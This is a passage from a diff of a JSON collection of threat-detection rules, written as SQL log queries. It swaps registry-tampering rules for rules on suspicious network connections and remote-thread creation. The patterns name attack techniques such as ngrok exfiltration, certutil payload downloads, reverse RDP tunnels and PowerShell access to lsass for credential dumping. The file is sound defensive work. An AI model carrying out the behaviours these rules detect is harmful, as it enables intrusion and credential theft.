DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" ], - "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + "filename": "net_connection_win_script_wan.yml" }, { - "title": "Potential Persistence Via App Paths Default Property", - "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "title": "Communication To Ngrok Tunneling Service", + "id": "1d08ac94-400d-4469-a82f-daee9a908849", "status": "experimental", - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.012" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + "Legitimate use of ngrok" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%iex%' ESCAPE '\\' OR NewValue LIKE '%Invoke-%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%regsvr32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_app_paths.yml" + "filename": "net_connection_win_ngrok_tunnel.yml" }, { - "title": "Blackbyte Ransomware Registry", - "id": "83314318-052a-4c90-a1ad-660ece38d276", + "title": "RDP Over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", "status": "test", - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "author": "frack113", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" ], - "filename": "registry_set_blackbyte_ransomware.yml" + "filename": "net_connection_win_rdp_reverse_tunnel.yml" }, { - "title": "Potential Persistence Via MyComputer Registry Keys", - "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", - "status": "experimental", - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Program Location with Network Connections", + "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "status": "test", + "description": "Detects programs with network connections running in suspicious files system locations", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_mycomputer.yml" + "filename": "net_connection_win_susp_prog_location_network_connection.yml" }, { - "title": "Service Binary in Suspicious Folder", - "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "title": "Suspicious Network Connection Binary No CommandLine", + "id": "20384606-a124-4fec-acbb-8bd373728613", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" ], - "filename": "registry_set_creation_service_susp_folder.yml" + "filename": "net_connection_win_susp_binary_no_cmdline.yml" }, { - "title": "Adwind RAT / JRAT - Registry", - "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", - "status": "experimental", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "Remote PowerShell Session (Network)", + "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "status": "test", + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ], + "falsepositives": [ + "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", + "Network Service user name of a not-covered localization" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND NewValue LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" ], - "filename": "registry_set_mal_adwind.yml" + "filename": "net_connection_win_remote_powershell_session_network.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features - Registry", - "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "title": "Cmstp Making Network Connection", + "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", "status": "experimental", - "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "description": "Detects suspicious network connection by Cmstp", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" ], - "filename": "registry_set_turn_on_dev_features.yml" + "filename": "net_connection_win_susp_cmstp.yml" }, { - "title": "NET NGenAssemblyUsageLog Registry Key Tamper", - "id": "28036918-04d3-423d-91c0-55ecf99fb892", - "status": "experimental", - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", - "author": "frack113", + "title": "Potential Dead Drop Resolvers", + "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "status": "test", + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "author": "Sorina Ionescu", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" ], "falsepositives": [ - "Unknown" + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((Initiated = 'true' AND (DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsSense.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Engine.exe' ESCAPE '\\')))" ], - "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" + "filename": "net_connection_win_dead_drop_resolvers.yml" }, { - "title": "Potential Persistence Via CHM Helper DLL", - "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "title": "RDP to HTTP or HTTPS Target Ports", + "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "status": "experimental", - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" ], - "filename": "registry_set_persistence_chm.yml" + "filename": "net_connection_win_rdp_to_http.yml" }, { - "title": "Disable PUA Protection on Windows Defender", - "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "title": "Connection Initiated Via Certutil.EXE", + "id": "0dba975d-a193-4ed1-a067-424df57570d1", "status": "experimental", - "description": "Detects disabling Windows Defender PUA protection", - "author": "Austin Songer @austinsonger", + "description": "Detects a network connection initiated by the certutil.exe tool.\nAttackers can abuse the utility in order to download malware or additional payloads.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '135', '443', '445'))" ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + "filename": "net_connection_win_certutil_initiated_connection.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", - "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Epmap Connection", + "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "status": "experimental", + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "author": "frack113, Tim Shelton (fps)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.lateral_movement" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue IN ('0', 'DWORD (0x00000000)'))))" + "SELECT * FROM logs WHERE ((Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" ], - "filename": "registry_set_dot_net_etw_tamper.yml" + "filename": "net_connection_win_susp_epmap.yml" }, { - "title": "Potential Persistence Via GlobalFlags", - "id": "36803969-5421-41ec-b92f-8500f79c23b0", + "title": "CobaltStrike Process Injection", + "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "status": "test", - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.persistence", "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\')" ], - "filename": "registry_set_persistence_globalflags.yml" + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" }, { - "title": "Potential Attachment Manager Settings Associations Tamper", - "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "title": "Remote Thread Creation Ttdinject.exe Proxy", + "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND NewValue = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (NewValue LIKE '%.zip;%' ESCAPE '\\' OR NewValue LIKE '%.rar;%' ESCAPE '\\' OR NewValue LIKE '%.exe;%' ESCAPE '\\' OR NewValue LIKE '%.bat;%' ESCAPE '\\' OR NewValue LIKE '%.com;%' ESCAPE '\\' OR NewValue LIKE '%.cmd;%' ESCAPE '\\' OR NewValue LIKE '%.reg;%' ESCAPE '\\' OR NewValue LIKE '%.msi;%' ESCAPE '\\' OR NewValue LIKE '%.htm;%' ESCAPE '\\' OR NewValue LIKE '%.html;%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\'" ], - "filename": "registry_set_policies_associations_tamper.yml" + "filename": "create_remote_thread_win_ttdinjec.yml" }, { - "title": "Hide Schedule Task Via Index Value Tamper", - "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", + "id": "fb656378-f909-47c1-8747-278bf09f4f4f", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", - "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "title": "Bumblebee Remote Thread Creation", + "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", "status": "experimental", - "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "description": "Detects remote thread injection events based on action seen used by bumblebee", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' 